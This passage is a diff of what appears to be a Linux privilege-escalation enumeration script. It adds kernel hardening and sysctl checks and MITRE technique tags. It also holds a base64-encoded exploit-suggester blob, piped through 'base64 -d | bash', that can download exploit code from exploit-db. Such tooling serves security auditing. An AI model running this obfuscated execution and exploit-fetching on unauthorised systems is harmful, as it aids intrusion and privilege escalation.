HRyZWR9Ti9BJHt0eHRyc3R9IikiCgplY2hvICJBZGRpdGlvbmFsIGNoZWNrcyAoQ09ORklHXyosIHN5c2N0bCBlbnRyaWVzLCBjdXN0b20gQmFzaCBjb21tYW5kcyk6ICQoWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9PSAiZmFsc2UiIF0gJiYgZWNobyAtZSAiJHt0eHRncm59cGVyZm9ybWVkJHt0eHRyc3R9IiB8fCBlY2hvIC1lICIke3R4dHJlZH1OL0Eke3R4dHJzdH0iKSIKCmlmIFsgLW4gIiRQS0dMSVNUX0ZJTEUiIC1hIC1uICIkUEtHX0xJU1QiIF07IHRoZW4KICAgIHBrZ0xpc3RGaWxlPSIke3R4dGdybn0kUEtHTElTVF9GSUxFJHt0eHRyc3R9IgplbGlmIFsgLW4gIiRQS0dMSVNUX0ZJTEUiIF07IHRoZW4KICAgIHBrZ0xpc3RGaWxlPSIke3R4dHJlZH11bnJlY29nbml6ZWQgZmlsZSBwcm92aWRlZCR7dHh0cnN0fSIKZWxpZiBbIC1uICIkUEtHX0xJU1QiIF07IHRoZW4KICAgIHBrZ0xpc3RGaWxlPSIke3R4dGdybn1mcm9tIGN1cnJlbnQgT1Mke3R4dHJzdH0iCmZpCgplY2hvIC1lICJQYWNrYWdlIGxpc3Rpbmc6ICQoWyAtbiAiJHBrZ0xpc3RGaWxlIiBdICYmIGVjaG8gLWUgIiRwa2dMaXN0RmlsZSIgfHwgZWNobyAtZSAiJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IikiCgojIGhhbmRsZSAtLWtlcm5lbHNwYWN5LW9ubHkgJiAtLXVzZXJzcGFjZS1vbmx5IGZpbHRlciBvcHRpb25zCmlmIFsgIiRvcHRfa2VybmVsX29ubHkiID0gInRydWUiIC1vIC16ICIkUEtHX0xJU1QiIF07IHRoZW4KICAgIHVuc2V0IEVYUExPSVRTX1VTRVJTUEFDRQogICAgZGVjbGFyZSAtQSBFWFBMT0lUU19VU0VSU1BBQ0UKZmkKCmlmIFsgIiRvcHRfdXNlcnNwYWNlX29ubHkiID0gInRydWUiIF07IHRoZW4KICAgIHVuc2V0IEVYUExPSVRTCiAgICBkZWNsYXJlIC1BIEVYUExPSVRTCmZpCgplY2hvCmVjaG8gLWUgIiR7Ymxkd2h0fVNlYXJjaGluZyBhbW9uZzoke3R4dHJzdH0iCmVjaG8KZWNobyAiJHsjRVhQTE9JVFNbQF19IGtlcm5lbCBzcGFjZSBleHBsb2l0cyIKZWNobyAiJHsjRVhQTE9JVFNfVVNFUlNQQUNFW0BdfSB1c2VyIHNwYWNlIGV4cGxvaXRzIgplY2hvCgplY2hvIC1lICIke2JsZHdodH1Qb3NzaWJsZSBFeHBsb2l0czoke3R4dHJzdH0iCmVjaG8KCiMgc3RhcnQgYW5hbHlzaXMKaj0wCmZvciBFWFAgaW4gIiR7RVhQTE9JVFNbQF19IiAiJHtFWFBMT0lUU19VU0VSU1BBQ0VbQF19IjsgZG8KCiAgICAjIGNyZWF0ZSBhcnJheSBmcm9tIGN1cnJlbnQgZXhwbG9pdCBoZXJlIGRvYyBhbmQgZmV0Y2ggbmVlZGVkIGxpbmVzCiAgICBpPTAKICAgICMgKCctcicgaXMgdXNlZCB0byBub3QgaW50ZXJwcmV0IGJhY2tzbGFzaCB1c2VkIGZvciBiYXNoIGNvbG9ycykKICAgIHdoaWxlIHJlYWQgLXIgbGluZQogICAgZG8KICAgICAgICBhcnJbaV09IiRsaW5lIgogICAgICAgIGk9JCgoaSArIDEpKQogICAgZG9uZSA8PDwgIiRFWFAiCgogICAgTkFNRT0iJHthcnJbMF19IiAmJiBOQU1FPSIke05BTUU6Nn0iCiAgICBSRVFTPSIke2FyclsxXX0iICYmIFJFUVM9IiR7UkVRUzo2fSIKICAgIFRBR1M9IiR7YXJyWzJdfSIgJiYgVEFHUz0iJHtUQUdTOjZ9IgogICAgUkFOSz0iJHthcnJbM119IiAmJiBSQU5LPSIke1JBTks6Nn0iCgogICAgIyBzcGxpdCBsaW5lIHdpdGggcmVxdWlyZW1lbnRzICYgbG9vcCB0aHJ1IGFsbCByZXFzIG9uZSBieSBvbmUgJiBjaGVjayB3aGV0aGVyIGl0IGlzIG1ldAogICAgSUZTPScsJyByZWFkIC1yIC1hIGFycmF5IDw8PCAiJFJFUVMiCiAgICBSRVFTX05VTT0keyNhcnJheVtAXX0KICAgIFBBU1NFRF9SRVE9MAogICAgZm9yIFJFUSBpbiAiJHthcnJheVtAXX0iOyBkbwogICAgICAgIGlmIChjaGVja1JlcXVpcmVtZW50ICIkUkVRIiAiJHthcnJheVswXX0iKTsgdGhlbgogICAgICAgICAgICBQQVNTRURfUkVRPSQoKCRQQVNTRURfUkVRICsgMSkpCiAgICAgICAgZWxzZQogICAgICAgICAgICBicmVhawogICAgICAgIGZpCiAgICBkb25lCgogICAgIyBleGVjdXRlIGZvciBleHBsb2l0cyB3aXRoIGFsbCByZXF1aXJlbWVudHMgbWV0CiAgICBpZiBbICRQQVNTRURfUkVRIC1lcSAkUkVRU19OVU0gXTsgdGhlbgoKICAgICAgICAjIGFkZGl0aW9uYWwgcmVxdWlyZW1lbnQgZm9yIC0tY3ZlbGlzdC1maWxlIG1vZGU6IGNoZWNrIGlmIENWRSBhc3NvY2lhdGVkIHdpdGggdGhlIGV4cGxvaXQgaXMgb24gdGhlIENWRUxJU1RfRklMRQogICAgICAgIGlmIFsgIiRvcHRfY3ZlbGlzdF9maWxlIiA9ICJ0cnVlIiBdOyB0aGVuCgogICAgICAgICAgICAjIGV4dHJhY3QgQ1ZFKHMpIGFzc29jaWF0ZWQgd2l0aCBnaXZlbiBleHBsb2l0IChhbHNvIHRyYW5zbGF0ZXMgJywnIHRvICd8JyBmb3IgZWFzeSBoYW5kbGluZyBtdWx0aXBsZSBDVkVzIGNhc2UgLSB2aWEgZXh0ZW5kZWQgcmVnZXgpCiAgICAgICAgICAgIGN2ZT0kKGVjaG8gIiROQU1FIiB8IGdyZXAgJy4qXFsuKlxdLionIHwgY3V0IC1kICdtJyAtZjIgfCBjdXQgLWQgJ10nIC1mMSB8IHRyIC1kICdbJyB8IHRyICIsIiAifCIpCiAgICAgICAgICAgICNlY2hvICJDVkU6ICRjdmUiCgogICAgICAgICAgICAjIGNoZWNrIGlmIGl0J3Mgb24gQ1ZFTElTVF9GSUxFIGxpc3QsIGlmIG5vIG1vdmUgdG8gbmV4dCBleHBsb2l0CiAgICAgICAgICAgIFsgISAkKGNhdCAiJENWRUxJU1RfRklMRSIgfCBncmVwIC1FICIkY3ZlIikgXSAmJiBjb250aW51ZQogICAgICAgIGZpCgogICAgICAgICMgcHJvY2VzcyB0YWdzIGFuZCBoaWdobGlnaHQgdGhvc2UgdGhhdCBtYXRjaCBjdXJyZW50IE9TIChvbmx5IGZvciBkZWJ8dWJ1bnR1fFJIRUwgYW5kIGlmIHdlIGtub3cgZGlzdHJvIHZlcnNpb24gLSBkaXJlY3QgbW9kZSkKICAgICAgICB0YWdzPSIiCiAgICAgICAgaWYgWyAtbiAiJFRBR1MiIC1hIC1uICIkT1MiIF07IHRoZW4KICAgICAgICAgICAgSUZTPScsJyByZWFkIC1yIC1hIHRhZ3NfYXJyYXkgPDw8ICIkVEFHUyIKICAgICAgICAgICAgVEFHU19OVU09JHsjdGFnc19hcnJheVtAXX0KCiAgICAgICAgICAgICMgYnVtcCBSQU5LIHNsaWdodGx5ICgrMSkgaWYgd2UncmUgaW4gJy0tdW5hbWUnIG1vZGUgYW5kIHRoZXJlJ3MgYSBUQUcgZm9yIE9TIGZyb20gdW5hbWUgc3RyaW5nCiAgICAgICAgICAgIFsgIiQoZWNobyAiJHt0YWdzX2FycmF5W0BdfSIgfCBncmVwICIkT1MiKSIgLWEgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAidHJ1ZSIgXSAmJiBSQU5LPSQoKCRSQU5LICsgMSkpCgogICAgICAgICAgICBmb3IgVEFHIGluICIke3RhZ3NfYXJyYXlbQF19IjsgZG8KICAgICAgICAgICAgICAgIHRhZ19kaXN0cm89JChlY2hvICIkVEFHIiB8IGN1dCAtZCc9JyAtZjEpCiAgICAgICAgICAgICAgICB0YWdfZGlzdHJvX251bV9hbGw9JChlY2hvICIkVEFHIiB8IGN1dCAtZCc9JyAtZjIpCiAgICAgICAgICAgICAgICAjIGluIGNhc2Ugb2YgdGFnIG9mIGZvcm06ICd1YnVudHU9MTYuMDR7a2VybmVsOjQuNC4wLTIxfSByZW1vdmUga2VybmVsIHZlcnNpb25pbmcgcGFydCBmb3IgY29tcGFyaXNpb24KICAgICAgICAgICAgICAgIHRhZ19kaXN0cm9fbnVtPSIke3RhZ19kaXN0cm9fbnVtX2FsbCV7Kn0iCgogICAgICAgICAgICAgICAgIyB3ZSdyZSBpbiAnLS11bmFtZScgbW9kZSBPUiAoZm9yIG5vcm1hbCBtb2RlKSBpZiB0aGVyZSBpcyBkaXN0cm8gdmVyc2lvbiBtYXRjaAogICAgICAgICAgICAgICAgaWYgWyAiJG9wdF91bmFtZV9zdHJpbmciID09ICJ0cnVlIiAtbyBcKCAiJE9TIiA9PSAiJHRhZ19kaXN0cm8iIC1hICIkKGVjaG8gIiRESVNUUk8iIHwgZ3JlcCAtRSAiJHRhZ19kaXN0cm9fbnVtIikiIFwpIF07IHRoZW4KCiAgICAgICAgICAgICAgICAgICAgIyBidW1wIGN1cnJlbnQgZXhwbG9pdCdzIHJhbmsgYnkgMiBmb3IgZGlzdHJvIG1hdGNoIChhbmQgbm90IGluICctLXVuYW1lJyBtb2RlKQogICAgICAgICAgICAgICAgICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAiZmFsc2UiIF0gJiYgUkFOSz0kKCgkUkFOSyArIDIpKQoKICAgICAgICAgICAgICAgICAgICAjIGdldCBuYW1lIChrZXJuZWwgb3IgcGFja2FnZSBuYW1lKSBhbmQgdmVyc2lvbiBvZiBrZXJuZWwvcGtnIGlmIHByb3ZpZGVkOgogICAgICAgICAgICAgICAgICAgIHRhZ19wa2c9JChlY2hvICIkdGFnX2Rpc3Ryb19udW1fYWxsIiB8IGN1dCAtZCd7JyAtZiAyIHwgdHIgLWQgJ30nIHwgY3V0IC1kJzonIC1mIDEpCiAgICAgICAgICAgICAgICAgICAgdGFnX3BrZ19udW09IiIKICAgICAgICAgICAgICAgICAgICBbICQoZWNobyAiJHRhZ19kaXN0cm9fbnVtX2FsbCIgfCBncmVwICd7JykgXSAmJiB0YWdfcGtnX251bT0kKGVjaG8gIiR0YWdfZGlzdHJvX251bV9hbGwiIHwgY3V0IC1kJ3snIC1mIDIgfCB0ciAtZCAnfScgfCBjdXQgLWQnOicgLWYgMikKCiAgICAgICAgICAgICAgICAgICAgI1sgLW4gIiR0YWdfcGtnX251bSIgXSAmJiBlY2hvICJ0YWdfcGtnX251bTogJHRhZ19wa2dfbnVtOyBrZXJuZWw6ICRLRVJORUxfQUxMIgoKICAgICAgICAgICAgICAgICAgICAjIGlmIHBrZy9rZXJuZWwgdmVyc2lvbiBpcyBub3QgcHJvdmlkZWQ6CiAgICAgICAgICAgICAgICAgICAgaWYgWyAteiAiJHRhZ19wa2dfbnVtIiBdOyB0aGVuCiAgICAgICAgICAgICAgICAgICAgICAgIFsgIiRvcHRfdW5hbWVfc3RyaW5nIiA9PSAiZmFsc2UiIF0gJiYgVEFHPSIke2xpZ2h0eWVsbG93fVsgJHtUQUd9IF0ke3R4dHJzdH0iCgogICAgICAgICAgICAgICAgICAgICMga2VybmVsIHZlcnNpb24gcHJvdmlkZWQsIGNoZWNrIGZvciBtYXRjaDoKICAgICAgICAgICAgICAgICAgICBlbGlmIFsgLW4gIiR0YWdfcGtnX251bSIgLWEgIiR0YWdfcGtnIiA9ICJrZXJuZWwiIF07IHRoZW4KICAgICAgICAgICAgICAgICAgICAgICAgaWYgWyAkKGVjaG8gIiRLRVJORUxfQUxMIiB8IGdyZXAgLUUgIiR7dGFnX3BrZ19udW19IikgXTsgdGhlbgogICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBrZXJuZWwgdmVyc2lvbiBtYXRjaGVkIC0gYm9sZCBoaWdobGlnaHQKICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRBRz0iJHt5ZWxsb3d9WyAke1RBR30gXSR7dHh0cnN0fSIKCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAjIGJ1bXAgY3VycmVudCBleHBsb2l0J3MgcmFuayBhZGRpdGlvbmFsbHkgYnkgMyBmb3Iga2VybmVsIHZlcnNpb24gcmVnZXggbWF0Y2gKICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJBTks9JCgoJFJBTksgKyAzKSkKICAgICAgICAgICAgICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgICAgICAgICAgICAgWyAiJG9wdF91bmFtZV9zdHJpbmciID09ICJmYWxzZSIgXSAmJiBUQUc9IiR7bGlnaHR5ZWxsb3d9WyAkdGFnX2Rpc3Rybz0kdGFnX2Rpc3Ryb19udW0gXSR7dHh0cnN0fXtrZXJuZWw6JHRhZ19wa2dfbnVtfSIKICAgICAgICAgICAgICAgICAgICAgICAgZmkKCiAgICAgICAgICAgICAgICAgICAgIyBwa2cgdmVyc2lvbiBwcm92aWRlZCwgY2hlY2sgZm9yIG1hdGNoIChUQkQpOgogICAgICAgICAgICAgICAgICAgIGVsaWYgWyAtbiAiJHRhZ19wa2dfbnVtIiAtYSAtbiAiJHRhZ19wa2ciICBdOyB0aGVuCiAgICAgICAgICAgICAgICAgICAgICAgIFRBRz0iJHtsaWdodHllbGxvd31bICR0YWdfZGlzdHJvPSR0YWdfZGlzdHJvX251bSBdJHt0eHRyc3R9eyR0YWdfcGtnOiR0YWdfcGtnX251bX0iCiAgICAgICAgICAgICAgICAgICAgZmkKCiAgICAgICAgICAgICAgICBmaQoKICAgICAgICAgICAgICAgICMgYXBwZW5kIGN1cnJlbnQgdGFnIHRvIHRhZ3MgbGlzdAogICAgICAgICAgICAgICAgdGFncz0iJHt0YWdzfSR7VEFHfSwiCiAgICAgICAgICAgIGRvbmUKICAgICAgICAgICAgIyB0cmltICcsJyBhZGRlZCBieSBhYm92ZSBsb29wCiAgICAgICAgICAgIFsgLW4gIiR0YWdzIiBdICYmIHRhZ3M9IiR7dGFncyU/fSIKICAgICAgICBlbHNlCiAgICAgICAgICAgIHRhZ3M9IiRUQUdTIgogICAgICAgIGZpCgogICAgICAgICMgaW5zZXJ0IHRoZSBtYXRjaGVkIGV4cGxvaXQgKHdpdGggY2FsY3VsYXRlZCBSYW5rIGFuZCBoaWdobGlnaHRlZCB0YWdzKSB0byBhcnJhcnkgdGhhdCB3aWxsIGJlIHNvcnRlZAogICAgICAgIEVYUD0kKGVjaG8gIiRFWFAiIHwgc2VkIC1lICcvXk5hbWU6L2QnIC1lICcvXlJlcXM6L2QnIC1lICcvXlRhZ3M6L2QnKQogICAgICAgIGV4cGxvaXRzX3RvX3NvcnRbal09IiR7UkFOS31OYW1lOiAke05BTUV9RDNMMW1SZXFzOiAke1JFUVN9RDNMMW1UYWdzOiAke3RhZ3N9RDNMMW0kKGVjaG8gIiRFWFAiIHwgc2VkIC1lICc6YScgLWUgJ04nIC1lICckIWJhJyAtZSAncy9cbi9EM0wxbS9nJykiCiAgICAgICAgKChqKyspKQogICAgZmkKZG9uZQoKIyBzb3J0IGV4cGxvaXRzIGJhc2VkIG9uIGNhbGN1bGF0ZWQgUmFuawpJRlM9JCdcbicKU09SVEVEX0VYUExPSVRTPSgkKHNvcnQgLXIgPDw8IiR7ZXhwbG9pdHNfdG9fc29ydFsqXX0iKSkKdW5zZXQgSUZTCgojIGRpc3BsYXkgc29ydGVkIGV4cGxvaXRzCmZvciBFWFBfVEVNUCBpbiAiJHtTT1JURURfRVhQTE9JVFNbQF19IjsgZG8KCglSQU5LPSQoZWNobyAiJEVYUF9URU1QIiB8IGF3ayAtRidOYW1lOicgJ3twcmludCAkMX0nKQoKCSMgY29udmVydCBlbnRyeSBiYWNrIHRvIGNhbm9uaWNhbCBmb3JtCglFWFA9JChlY2hvICIkRVhQX1RFTVAiIHwgc2VkICdzL15bMC05XS8vZycgfCBzZWQgJ3MvRDNMMW0vXG4vZycpCgoJIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRVhQIgoKICAgIE5BTUU9IiR7YXJyWzBdfSIgJiYgTkFNRT0iJHtOQU1FOjZ9IgogICAgUkVRUz0iJHthcnJbMV19IiAmJiBSRVFTPSIke1JFUVM6Nn0iCiAgICBUQUdTPSIke2FyclsyXX0iICYmIHRhZ3M9IiR7VEFHUzo2fSIKCglFWFBMT0lUX0RCPSQoZWNobyAiJEVYUCIgfCBncmVwICJleHBsb2l0LWRiOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCWFuYWx5c2lzX3VybD0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiYW5hbHlzaXMtdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCWV4dF91cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImV4dC11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoJY29tbWVudHM9JChlY2hvICIkRVhQIiB8IGdyZXAgIkNvbW1lbnRzOiAiIHwgY3V0IC1kJyAnIC1mIDItKQoJcmVxcz0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiUmVxczogIiB8IGN1dCAtZCcgJyAtZiAyKQoKCSMgZXhwbG9pdCBuYW1lIHdpdGhvdXQgQ1ZFIG51bWJlciBhbmQgd2l0aG91dCBjb21tb25seSB1c2VkIHNwZWNpYWwgY2hhcnMKCW5hbWU9JChlY2hvICIkTkFNRSIgfCBjdXQgLWQnICcgLWYgMi0gfCB0ciAtZCAnICgpLycpCgoJYmluX3VybD0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiYmluLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglzcmNfdXJsPSQoZWNobyAiJEVYUCIgfCBncmVwICJzcmMtdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCVsgLXogIiRzcmNfdXJsIiBdICYmIFsgLW4gIiRFWFBMT0lUX0RCIiBdICYmIHNyY191cmw9Imh0dHBzOi8vd3d3LmV4cGxvaXQtZGIuY29tL2Rvd25sb2FkLyRFWFBMT0lUX0RCIgoJWyAteiAiJHNyY191cmwiIF0gJiYgWyAteiAiJGJpbl91cmwiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIidzcmMtdXJsJyAvICdiaW4tdXJsJyAvICdleHBsb2l0LWRiJyBlbnRyaWVzIGFyZSBhbGwgZW1wdHkgZm9yICckTkFNRScgZXhwbG9pdCAtIGZpeCB0aGF0LiBBYm9ydGluZy4iCgoJaWYgWyAtbiAiJGFuYWx5c2lzX3VybCIgXTsgdGhlbgogICAgICAgIGRldGFpbHM9IiRhbmFseXNpc191cmwiCgllbGlmICQoZWNobyAiJHNyY191cmwiIHwgZ3JlcCAtcSAnd3d3LmV4cGxvaXQtZGIuY29tJyk7IHRoZW4KICAgICAgICBkZXRhaWxzPSJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8kRVhQTE9JVF9EQi8iCgllbGlmIFtbICIkc3JjX3VybCIgPX4gXi4qdGd6fHRhci5nenx6aXAkICYmIC1uICIkRVhQTE9JVF9EQiIgXV07IHRoZW4KICAgICAgICBkZXRhaWxzPSJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8kRVhQTE9JVF9EQi8iCgllbHNlCiAgICAgICAgZGV0YWlscz0iJHNyY191cmwiCglmaQoKCSMgc2tpcCBEb1MgYnkgZGVmYXVsdAoJZG9zPSQoZWNobyAiJEVYUCIgfCBncmVwIC1vIC1pICIoZG9zIikKCVsgIiRvcHRfc2hvd19kb3MiID09ICJmYWxzZSIgXSAmJiBbIC1uICIkZG9zIiBdICYmIGNvbnRpbnVlCgoJIyBoYW5kbGVzIC0tZmV0Y2gtYmluYXJpZXMgb3B0aW9uCglpZiBbICRvcHRfZmV0Y2hfYmlucyA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgZm9yIGkgaW4gJChlY2hvICIkRVhQIiB8IGdyZXAgImJpbi11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKTsgZG8KICAgICAgICAgICAgWyAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRpKSIgXSAmJiBybSAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRpKSIKICAgICAgICAgICAgd2dldCAtcSAtayAiJGkiIC1PICIke25hbWV9XyQoYmFzZW5hbWUgJGkpIgogICAgICAgIGRvbmUKICAgIGZpCgoJIyBoYW5kbGVzIC0tZmV0Y2gtc291cmNlcyBvcHRpb24KCWlmIFsgJG9wdF9mZXRjaF9zcmNzID0gInRydWUiIF07IHRoZW4KICAgICAgICBbIC1mICIke25hbWV9XyQoYmFzZW5hbWUgJHNyY191cmwpIiBdICYmIHJtIC1mICIke25hbWV9XyQoYmFzZW5hbWUgJHNyY191cmwpIgogICAgICAgIHdnZXQgLXEgLWsgIiRzcmNfdXJsIiAtTyAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIgJgogICAgZmkKCiAgICAjIGRpc3BsYXkgcmVzdWx0IChzaG9ydCkKCWlmIFsgIiRvcHRfc3VtbWFyeSIgPSAidHJ1ZSIgXTsgdGhlbgoJWyAteiAiJHRhZ3MiIF0gJiYgdGFncz0iLSIKCWVjaG8gLWUgIiROQU1FIHx8ICR0YWdzIHx8ICRzcmNfdXJsIgoJY29udGludWUKCWZpCgojIGRpc3BsYXkgcmVzdWx0IChzdGFuZGFyZCkKCWVjaG8gLWUgIlsrXSAkTkFNRSIKCWVjaG8gLWUgIlxuICAgRGV0YWlsczogJGRldGFpbHMiCiAgICAgICAgZWNobyAtZSAiICAgRXhwb3N1cmU6ICQoZGlzcGxheUV4cG9zdXJlICRSQU5LKSIKICAgICAgICBbIC1uICIkdGFncyIgXSAmJiBlY2hvIC1lICIgICBUYWdzOiAkdGFncyIKICAgICAgICBlY2hvIC1lICIgICBEb3dubG9hZCBVUkw6ICRzcmNfdXJsIgogICAgICAgIFsgLW4gIiRleHRfdXJsIiBdICYmIGVjaG8gLWUgIiAgIGV4dC11cmw6ICRleHRfdXJsIgogICAgICAgIFsgLW4gIiRjb21tZW50cyIgXSAmJiBlY2hvIC1lICIgICBDb21tZW50czogJGNvbW1lbnRzIgoKICAgICAgICAjIGhhbmRsZXMgLS1mdWxsIGZpbHRlciBvcHRpb24KICAgICAgICBpZiBbICIkb3B0X2Z1bGwiID0gInRydWUiIF07IHRoZW4KICAgICAgICAgICAgWyAtbiAiJHJlcXMiIF0gJiYgZWNobyAtZSAiICAgUmVxdWlyZW1lbnRzOiAkcmVxcyIKCiAgICAgICAgICAgIFsgLW4gIiRFWFBMT0lUX0RCIiBdICYmIGVjaG8gLWUgIiAgIGV4cGxvaXQtZGI6ICRFWFBMT0lUX0RCIgoKICAgICAgICAgICAgYXV0aG9yPSQoZWNobyAiJEVYUCIgfCBncmVwICJhdXRob3I6ICIgfCBjdXQgLWQnICcgLWYgMi0pCiAgICAgICAgICAgIFsgLW4gIiRhdXRob3IiIF0gJiYgZWNobyAtZSAiICAgYXV0aG9yOiAkYXV0aG9yIgogICAgICAgIGZpCgogICAgICAgIGVjaG8KCmRvbmUK" - echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s/\[(CVE-[0-9]+-[0-9]+,?)+\].*/${SED_RED}/g" - echo "" -fi - -if apt list --installed 2>/dev/null | grep -q 'polkit.*0\.105-26' || \ - yum list installed 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)' || \ - rpm -qa 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)'; then - echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW}," - echo "" fi +if check_mitre_filter "T1518.001"; then +print_sysctl_eq_zero() { + local label="$1" + local sysctl_path="$2" + local sysctl_var="$3" + local zero_color="$4" + local nonzero_color="$5" + local sysctl_value + print_list "$label" "$NC" + sysctl_value=$(cat "$sysctl_path" 2>/dev/null) + eval "$sysctl_var=\$sysctl_value" + if [ -z "$sysctl_value" ]; then + echo_not_found "$sysctl_path" + else + if [ "$sysctl_value" -eq 0 ]; then + echo "0" | sed -${E} "s,0,${zero_color}," + else + echo "$sysctl_value" | sed -${E} "s,.*,${nonzero_color},g" + fi + fi +} #-- SY) AppArmor -print_2title "Protections" +print_2title "Protections" "T1518.001" print_list "AppArmor enabled? .............. "$NC if [ "$(command -v aa-status 2>/dev/null || echo -n '')" ]; then aa-status 2>&1 | sed "s,disabled,${SED_RED}," @@ -1900,9 +3244,42 @@ print_list "Seccomp enabled? ............... "$NC #-- SY) AppArmor print_list "User namespace? ................ "$NC if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi +#-- SY) Unprivileged user namespaces +print_sysctl_eq_zero "unpriv_userns_clone? ........... " "/proc/sys/kernel/unprivileged_userns_clone" "unpriv_userns_clone" "$SED_GREEN" "$SED_RED" +#-- SY) Unprivileged eBPF +print_sysctl_eq_zero "unpriv_bpf_disabled? ........... " "/proc/sys/kernel/unprivileged_bpf_disabled" "unpriv_bpf_disabled" "$SED_RED" "$SED_GREEN" #-- SY) cgroup2 print_list "Cgroup2 enabled? ............... "$NC ([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," +#-- SY) Kernel hardening sysctls +print_sysctl_eq_zero "kptr_restrict? ................. " "/proc/sys/kernel/kptr_restrict" "kptr_restrict" "$SED_RED" "$SED_GREEN" +print_sysctl_eq_zero "dmesg_restrict? ................ " "/proc/sys/kernel/dmesg_restrict" "dmesg_restrict" "$SED_RED" "$SED_GREEN" +print_sysctl_eq_zero "ptrace_scope? .................. " "/proc/sys/kernel/yama/ptrace_scope" "ptrace_scope" "$SED_RED" "$SED_GREEN" +print_sysctl_eq_zero "protected_symlinks? ............ " "/proc/sys/fs/protected_symlinks" "protected_symlinks" "$SED_RED" "$SED_GREEN" +print_sysctl_eq_zero "protected_hardlinks? ........... " "/proc/sys/fs/protected_hardlinks" "protected_hardlinks" "$SED_RED" "$SED_GREEN" +print_list "perf_event_paranoid? ........... "$NC +perf_event_paranoid=$(cat /proc/sys/kernel/perf_event_paranoid 2>/dev/null) +if [ -z "$perf_event_paranoid" ]; then + echo_not_found "/proc/sys/kernel/perf_event_paranoid" +else + if [ "$perf_event_paranoid" -le 1 ]; then echo "$perf_event_paranoid" | sed -${E} "s,.*,${SED_RED},g"; else echo "$perf_event_paranoid" | sed -${E} "s,.*,${SED_GREEN},g"; fi +fi +print_sysctl_eq_zero "mmap_min_addr? ................. " "/proc/sys/vm/mmap_min_addr" "mmap_min_addr" "$SED_RED" "$SED_GREEN" +print_list "lockdown mode? ................. "$NC +if [ -f "/sys/kernel/security/lockdown" ]; then + cat /sys/kernel/security/lockdown 2>/dev/null | sed -${E} "s,none,${SED_RED},g; s,integrity|confidentiality,${SED_GREEN},g" +else + echo_not_found "/sys/kernel/security/lockdown" +fi +#-- SY) Kernel hardening config flags +print_list "Kernel hardening flags? ........ "$NC +if [ -f "/boot/config-$(uname -r)" ]; then + grep -E 'CONFIG_RANDOMIZE_BASE|CONFIG_STACKPROTECTOR|CONFIG_SLAB_FREELIST_|CONFIG_KASAN' /boot/config-$(uname -r) 2>/dev/null +elif [ -f "/proc/config.gz" ]; then + zcat /proc/config.gz 2>/dev/null | grep -E 'CONFIG_RANDOMIZE_BASE|CONFIG_STACKPROTECTOR|CONFIG_SLAB_FREELIST_|CONFIG_KASAN' +else + echo_not_found "kernel config" +fi #-- SY) Gatekeeper if [ "$MACPEAS" ]; then print_list "Gatekeeper enabled? .......... "$NC @@ -1945,19 +3322,26 @@ else fi echo "" +fi + +if check_mitre_filter "T1547.006"; then echo "" -print_2title "Kernel Modules Information" +print_2title "Kernel Modules Information" "T1547.006" # List loaded kernel modules if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then - print_3title "Loaded kernel modules" + print_3title "Loaded kernel modules" "T1547.006" if [ -f "/proc/modules" ]; then - lsmod + if command -v lsmod >/dev/null 2>&1; then + lsmod + else + cat /proc/modules + fi else echo_not_found "/proc/modules" fi fi # Check for kernel modules with weak permissions -print_3title "Kernel modules with weak perms?" +print_3title "Kernel modules with weak perms?" "T1547.006" if [ -d "/lib/modules" ]; then find /lib/modules -type f -name "*.ko" -ls 2>/dev/null | grep -Ev "root\s+root" | sed -${E} "s,.*,${SED_RED},g" if [ $? -eq 1 ]; then @@ -1968,7 +3352,7 @@ else fi echo "" # Check for kernel modules that can be loaded by unprivileged users -print_3title "Kernel modules loadable? " +print_3title "Kernel modules loadable? " "T1547.006" if [ -f "/proc/sys/kernel/modules_disabled" ]; then if [ 